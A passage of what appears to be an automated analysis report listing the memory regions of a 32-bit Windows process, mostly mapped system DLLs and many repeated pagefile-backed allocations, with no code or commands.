0x774d0000 end_va = 0x7756cfff entry_point = 0x774d0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1250 start_va = 0x77600000 end_va = 0x7768ffff entry_point = 0x77600000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1251 start_va = 0x777f0000 end_va = 0x77808fff entry_point = 0x777f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1252 start_va = 0x77810000 end_va = 0x7789efff entry_point = 0x77810000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1253 start_va = 0x77930000 end_va = 0x77a4efff entry_point = 0x0 region_type = private name = "private_0x0000000077930000" filename = "" Region: id = 1254 start_va = 0x77a50000 end_va = 0x77b49fff entry_point = 0x0 region_type = private name = "private_0x0000000077a50000" filename = "" Region: id = 1255 start_va = 0x77d00000 end_va = 0x77d09fff entry_point = 0x77d00000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1256 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1257 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1258 start_va = 0x720000 end_va = 0x8a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 1259 start_va = 0x76050000 end_va = 0x7611bfff entry_point = 0x76050000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1260 start_va = 0x77790000 end_va = 0x777effff entry_point = 0x77790000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1272 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1273 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1274 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 1275 start_va = 0x220000 end_va = 0x221fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 1276 start_va = 0x230000 end_va = 0x23afff entry_point = 0x230000 region_type = mapped_file name = "odbcint.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\odbcint.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\odbcint.dll.mui") Region: id = 1277 start_va = 0x240000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 1278 start_va = 0x2c0000 end_va = 0x2c7fff entry_point = 0x2c0000 region_type = mapped_file name = "mfc42u.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\MFC42u.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mfc42u.dll.mui") Region: id = 1279 start_va = 0x2d0000 end_va = 0x2d1fff entry_point = 0x2d0000 region_type = mapped_file name = "scarddlg.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\SCardDlg.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\scarddlg.dll.mui") Region: id = 1280 start_va = 0x3c0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 1281 start_va = 0x8b0000 end_va = 0xa30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 1282 start_va = 0xa40000 end_va = 0x1e3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a40000" filename = "" Region: id = 1283 start_va = 0x1fe0000 end_va = 0x201ffff entry_point = 0x0 region_type = private name = "private_0x0000000001fe0000" filename = "" Region: id = 1284 start_va = 0x2020000 end_va = 0x2412fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002020000" filename = "" Region: id = 1285 start_va = 0x75240000 end_va = 0x75277fff entry_point = 0x75240000 region_type = mapped_file name = "odbcint.dll" filename = "\\Windows\\SysWOW64\\odbcint.dll" (normalized: "c:\\windows\\syswow64\\odbcint.dll") Region: id = 1287 start_va = 0x2e0000 end_va = 0x2e0fff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 1288 start_va = 0x4c0000 end_va = 0x543fff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1289 start_va = 0x1e40000 end_va = 0x1eeafff entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 1290 start_va = 0x751e0000 end_va = 0x751e7fff entry_point = 0x751e0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 1292 start_va = 0x778f0000 end_va = 0x77924fff entry_point = 0x778f0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1293 start_va = 0x75a00000 end_va = 0x75a05fff entry_point = 0x75a00000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1294 start_va = 0x2420000 end_va = 0x25dffff entry_point = 0x0 region_type = private name = "private_0x0000000002420000" filename = "" Region: id = 1295 start_va = 0x751c0000 end_va = 0x751d6fff entry_point = 0x751c0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 1296 start_va = 0x751b0000 end_va = 0x751bafff entry_point = 0x751b0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1298 start_va = 0x750c0000 end_va = 0x751aafff entry_point = 0x750c0000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 1302 start_va = 0x4c0000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1304 start_va = 0x750a0000 end_va = 0x750acfff entry_point = 0x750a0000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\SysWOW64\\wtsapi32.dll" (normalized: "c:\\windows\\syswow64\\wtsapi32.dll") Region: id = 1305 start_va = 0x75920000 end_va = 0x75976fff entry_point = 0x75920000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1306 start_va = 0x76880000 end_va = 0x774c9fff entry_point = 0x76880000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1307 start_va = 0x2420000 end_va = 0x251ffff entry_point = 0x0 region_type = private name = "private_0x0000000002420000" filename = "" Region: id = 1308 start_va = 0x25a0000 end_va = 0x25dffff entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 1309 start_va = 0x755c0000 end_va = 0x755c2fff entry_point = 0x755c0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 1310 start_va = 0x2f0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 1311 start_va = 0x380000 end_va = 0x387fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 1312 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1313 start_va = 0x25e0000 end_va = 0x28aefff entry_point = 0x25e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1314 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1315 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1316 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1317 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1318 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1319 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1320 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1321 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1322 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1323 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1324 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1325 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1326 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1327 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1328 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1329 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1330 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1331 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1332 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1333 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1334 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1335 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1336 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1337 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1338 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1339 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1340 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1341 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1342 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1343 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1344 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1345 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1346 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1347 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1348 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1349 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1350 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1351 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1352 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1353 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1354 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1355 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1356 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1357 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1358 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1359 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1360 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1361 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1362 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1363 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1365 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1366 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1367 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1368 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1369 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1370 start_va = 0x2f0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 1371 start_va = 0x380000 end_va = 0x387fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 1372 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1373 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1374 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1375 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1376 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1377 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1378 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1379 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1380 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1381 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1382 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1383 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1384 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1385 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1386 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1387 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1388 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1389 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1390 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1391 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1392 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1393 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1394 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1395 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1396 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1397 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1398 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1399 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1400 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1401 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1402 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1403 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1404 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1405 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1406 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1407 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1408 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1409 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1410 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1411 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1412 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1413 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1414 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1415 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1416 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1417 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1418 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1419 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1420 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1421 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1422 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1423 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1424 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1425 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1426 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1427 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1428 start_va = 0x2f0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 1429 start_va = 0x380000 end_va = 0x387fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 1430 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1431 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1432 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1433 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1434 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1435 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1436 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1437 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1438 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1439 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1440 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1441 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1442 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1443 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1444 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1445 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1446 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1447 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1448 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1449 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1450 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1451 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1452 start_va = 0x2f0000 